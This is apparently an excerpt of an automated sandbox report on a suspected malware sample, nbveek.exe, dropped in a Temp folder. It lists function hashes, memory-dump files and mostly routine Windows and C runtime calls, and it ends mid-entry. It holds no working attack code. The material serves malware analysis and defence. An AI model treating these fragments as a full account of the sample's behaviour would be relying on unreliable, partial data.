                                                                                                                                                                                      • Opcode ID: 3e52bd7b0628daa0e336240856c5f7a88f7316d99732f5ce983d3386994c6b2d
                                                                                                                                                                                      • Instruction ID: 0be26afb919034312dd417ec8a271ac1ffb9234ae36bd11f1263260669c7f405
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e52bd7b0628daa0e336240856c5f7a88f7316d99732f5ce983d3386994c6b2d
                                                                                                                                                                                      • Instruction Fuzzy Hash: E201F73261A7125EA73D3978BCC4A673F94EF516FA364833AE530641D8EF2148404EA4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe, xrefs: 0118FCE4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe
                                                                                                                                                                                      • API String ID: 0-3515184742
                                                                                                                                                                                      • Opcode ID: 25418cc0135f9023e679b987d2844b542591d1d0dcdd5456e81625b28a355188
                                                                                                                                                                                      • Instruction ID: ce06d1695b2507b16dec78b4608364882981351e5667b0ac37412449a0b81582
                                                                                                                                                                                      • Opcode Fuzzy Hash: 25418cc0135f9023e679b987d2844b542591d1d0dcdd5456e81625b28a355188
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A21CF71604217AFDB29BF6ACC80D2F77ACAF44268710C614FA36D6150D730EC418FA5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _wcsrchr
                                                                                                                                                                                      • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                      • API String ID: 1752292252-4019086052
                                                                                                                                                                                      • Opcode ID: b490a12d69b8076dd4559bbacaf2d37f66914aac2c5ae66faf4933f4fa193d94
                                                                                                                                                                                      • Instruction ID: fe800dcec3259f713114c02248bf8e768807b2563b062e92bac79b07570d184b
                                                                                                                                                                                      • Opcode Fuzzy Hash: b490a12d69b8076dd4559bbacaf2d37f66914aac2c5ae66faf4933f4fa193d94
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0501DF37B0861725AB3D701D7C01B263F998F95AB4715801EFD64FF680EF84D8424694
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                      • API String ID: 0-2084034818
                                                                                                                                                                                      • Opcode ID: 40dc998fa23ead0573d7249d78ff4d843d17e2872526db3f59513048a7810a5a
                                                                                                                                                                                      • Instruction ID: e648295adb6f1ecd711d50d7c671daf7174ea13e6043dca88903dca23b786c1e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 40dc998fa23ead0573d7249d78ff4d843d17e2872526db3f59513048a7810a5a
                                                                                                                                                                                      • Instruction Fuzzy Hash: BB11B071902119BBDB3EAA29DC44A7E37549B856BCB254221FD16A7240E730ED00CED1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0118A688,0118CA9B,?,0118A650,0118ABD6,?,0118CA9B), ref: 0118A6A8
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0118A6BB
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,0118A688,0118CA9B,?,0118A650,0118ABD6,?,0118CA9B), ref: 0118A6DE
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                      • Opcode ID: abe791a8032d1799e75efb99c42614dbf358521bb4333d0b4a705f61837634ac
                                                                                                                                                                                      • Instruction ID: e41eb21c9e622a97709ffdc3b57ac4585e0b9a27ffe86cd8d215750475d190da
                                                                                                                                                                                      • Opcode Fuzzy Hash: abe791a8032d1799e75efb99c42614dbf358521bb4333d0b4a705f61837634ac
                                                                                                                                                                                      • Instruction Fuzzy Hash: A3F0E230602208FBDB29AB50ED0DB8D7E69EF40799F244070A620E2054CB348E40DB80
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCPInfo.KERNEL32(01391A48,01391A48,?,7FFFFFFF,?,?,01195FD5,01391A48,01391A48,?,01391A48,?,?,?,?,01391A48), ref: 01195DBC
                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 01195E72
                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 01195F08
                                                                                                                                                                                      • __freea.LIBCMT ref: 01195F73
                                                                                                                                                                                      • __freea.LIBCMT ref: 01195F7F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __alloca_probe_16__freea$Info
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2330168043-0
                                                                                                                                                                                      • Opcode ID: 3a86b448c4d6323a1b33a9f85077c8788c64a874a0fdcf363bc9de3e870fda3f
                                                                                                                                                                                      • Instruction ID: ff6f42d1ba16060e2ac1f3ec91c9d3cc4734f54419d8b862872220ee096e4684
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a86b448c4d6323a1b33a9f85077c8788c64a874a0fdcf363bc9de3e870fda3f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7781C772D002165FDF6A9F68C850AEE7BF7DF09264F194056EA25B7240D731C841CBA2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 011946C8
                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0119478E
                                                                                                                                                                                      • __freea.LIBCMT ref: 011947FA
                                                                                                                                                                                        • Part of subcall function 0118D7EA: RtlAllocateHeap.NTDLL(00000000,A875633B,?,?,011870CE,A875633B,?,011857EB,?,?,?,?,?,?,01173B45,?), ref: 0118D81C
                                                                                                                                                                                      • __freea.LIBCMT ref: 01194803
                                                                                                                                                                                      • __freea.LIBCMT ref: 01194826
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1423051803-0
                                                                                                                                                                                      • Opcode ID: dec3d79ee6d122b2b0824302edfd7366b1724dd89ed2e88d015b0b84b1e4aa48
                                                                                                                                                                                      • Instruction ID: 1095b36fb0392a959e36a7b92e528a3792a53dd97f6716f9c9f1c4fea5441ea8
                                                                                                                                                                                      • Opcode Fuzzy Hash: dec3d79ee6d122b2b0824302edfd7366b1724dd89ed2e88d015b0b84b1e4aa48
                                                                                                                                                                                      • Instruction Fuzzy Hash: 075115B2510247ABEF2D9F98DD40EBF3BA9EF45654F154128FE249B540E770DC42C6A0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 01191066
                                                                                                                                                                                        • Part of subcall function 0118D301: HeapFree.KERNEL32(00000000,00000000,?,011910E1,?,00000000,?,?,?,01191108,?,00000007,?,?,0119150A,?), ref: 0118D317
                                                                                                                                                                                        • Part of subcall function 0118D301: GetLastError.KERNEL32(?,?,011910E1,?,00000000,?,?,?,01191108,?,00000007,?,?,0119150A,?,?), ref: 0118D329
                                                                                                                                                                                      • _free.LIBCMT ref: 01191078
                                                                                                                                                                                      • _free.LIBCMT ref: 0119108A
                                                                                                                                                                                      • _free.LIBCMT ref: 0119109C
                                                                                                                                                                                      • _free.LIBCMT ref: 011910AE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: 550180eec60f5bafb1b441d2409a7fc71165827d1f424672407daf6557d36fa9
                                                                                                                                                                                      • Instruction ID: efcade55ff773645c6cf0ba641afd1ed732d681533954f14acc42e2948bacdad
                                                                                                                                                                                      • Opcode Fuzzy Hash: 550180eec60f5bafb1b441d2409a7fc71165827d1f424672407daf6557d36fa9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DF04F72604742BB9E3DEAA9F6C0C167FE9AB003603A84815E529D7540C732FCC08A54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                      • String ID: *?
                                                                                                                                                                                      • API String ID: 269201875-2564092906
                                                                                                                                                                                      • Opcode ID: 6e2e50af061a89f8d40868070dd0582413b0f24a5e8512e61b65add0acbf9032
                                                                                                                                                                                      • Instruction ID: 6c38ee416f8b9fe430ab3bc777935fe856607eeafac040776c17a33ead383eaa
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e2e50af061a89f8d40868070dd0582413b0f24a5e8512e61b65add0acbf9032
                                                                                                                                                                                      • Instruction Fuzzy Hash: 17612D75E0021A9FDB19EFADC8805ADFBF5EF48214B24816AD915E7340E731AE428F90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 01179140: GetModuleFileNameA.KERNEL32(00000000,?,00000104,A875633B,00000000), ref: 0117917C
                                                                                                                                                                                        • Part of subcall function 01185760: Concurrency::cancel_current_task.LIBCPMT ref: 01185819
                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01181F34
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileModuleName$Concurrency::cancel_current_task
                                                                                                                                                                                      • String ID: 853321935212$L$Zyy=
                                                                                                                                                                                      • API String ID: 1489532554-2547970745
                                                                                                                                                                                      • Opcode ID: 7197ec2d176df0243980e06ec84e2e25d93a2dfbcf40b53a10160888d80defea
                                                                                                                                                                                      • Instruction ID: 3f2dba05017049a437e0381f969e49c9e0da737661fcff2d457f4fec5d6092c8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7197ec2d176df0243980e06ec84e2e25d93a2dfbcf40b53a10160888d80defea
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A21C1B49003499BCB1CFB38CA167ED7FB5AB26718F8440CCD44913281EB744A088BE3
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                                                      • Opcode ID: f2ca8d8c66567668ae5f9d5a1e68bbc2c499be25ec1fe23bca1a4669d4de5df3
                                                                                                                                                                                      • Instruction ID: 01b06acc4b2867982191cf9a70293eab4053711abf7bc4af401ebe8913ec8390
                                                                                                                                                                                      • Opcode Fuzzy Hash: f2ca8d8c66567668ae5f9d5a1e68bbc2c499be25ec1fe23bca1a4669d4de5df3
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0051E3726016469FEB2DBF18D840BBABBB4EF50319FA4C52DE91157290E731E890CF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 01194D4E
                                                                                                                                                                                      • _free.LIBCMT ref: 01194D77
                                                                                                                                                                                      • SetEndOfFile.KERNEL32(00000000,011922AF,00000000,0118D19E,?,?,?,?,?,?,?,011922AF,0118D19E,00000000), ref: 01194DA9
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,011922AF,0118D19E,00000000,?,?,?,?,00000000), ref: 01194DC5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFileLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1547350101-0
                                                                                                                                                                                      • Opcode ID: e87aaa3df73d06855f7d25c0ad8f9ee65594b9bf808a4ae97d2f3ed98f8fe897
                                                                                                                                                                                      • Instruction ID: 1ce61c22bf18c904ff530c68fbd5bde2da3756484d23849573c4f6e04d40f03c
                                                                                                                                                                                      • Opcode Fuzzy Hash: e87aaa3df73d06855f7d25c0ad8f9ee65594b9bf808a4ae97d2f3ed98f8fe897
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E41F7769006069BDF2DBBBCCE41B9D3BE9FF64324F144510EA35A7590EB30D8428B65
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0118AABF: _free.LIBCMT ref: 0118AACD
                                                                                                                                                                                        • Part of subcall function 01190623: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,011947F0,?,00000000,00000000), ref: 011906C5
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0118F6B3
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0118F6BA
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0118F6F9
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0118F700
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 167067550-0
                                                                                                                                                                                      • Opcode ID: 7932718f53a57ec95073ecb4b5c6bb09f3be0caece00373887dbf6d7ff06094a
                                                                                                                                                                                      • Instruction ID: 6fa0b4e50731f5b3e409e9b0317c05d3d95f94dcf201fc8df3c46c441e9f3ea3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7932718f53a57ec95073ecb4b5c6bb09f3be0caece00373887dbf6d7ff06094a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5021A471604A17AFAB29BF799C80C6BB79DEF4426C710C619E825D7250E730EC818FA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,0118AA3D,00000000,01173F53,?,?,0118ABD6,?,?,?,?,00000001), ref: 0118DBF7
                                                                                                                                                                                      • _free.LIBCMT ref: 0118DC54
                                                                                                                                                                                      • _free.LIBCMT ref: 0118DC8A
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,0118ABD6,?,?,?,?,00000001,?,?,?,01172C3A,?), ref: 0118DC95
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2283115069-0
                                                                                                                                                                                      • Opcode ID: e47d01edeeed994c112d3338e5a862f17942c2acf193f83b6fe47947cb1b5452
                                                                                                                                                                                      • Instruction ID: 04b22a177004158848a87be1ab1eee4a228cd192466c5d308f23b5824233d9c4
                                                                                                                                                                                      • Opcode Fuzzy Hash: e47d01edeeed994c112d3338e5a862f17942c2acf193f83b6fe47947cb1b5452
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0811CA713097026E9E2D76F97C84D6B3AAAD7D0579755C138F234821C4EFB19C438E10
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(A875633B,A875633B,?,0118B4A7,0118D82D,?,?,011870CE,A875633B,?,011857EB,?,?,?,?,?), ref: 0118DD4E
                                                                                                                                                                                      • _free.LIBCMT ref: 0118DDAB
                                                                                                                                                                                      • _free.LIBCMT ref: 0118DDE1
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,011870CE,A875633B,?,011857EB,?,?,?,?,?,?,01173B45,?), ref: 0118DDEC
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2283115069-0
                                                                                                                                                                                      • Opcode ID: 6bba41d8f42b5bc9ce4922e35700ee4f6e25aec820f86063c7d2d16e0eeb369c
                                                                                                                                                                                      • Instruction ID: 6635052caec69509b22c9cd8ed0637b07a3007a4a06953489a20c90824091086
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bba41d8f42b5bc9ce4922e35700ee4f6e25aec820f86063c7d2d16e0eeb369c
                                                                                                                                                                                      • Instruction Fuzzy Hash: D711C6B23097012E9E1E7AF9BC8096F39AADBD16797668334F530821C4DB319C438E10
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0118E693,00000000,?,011933BC,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0118E544
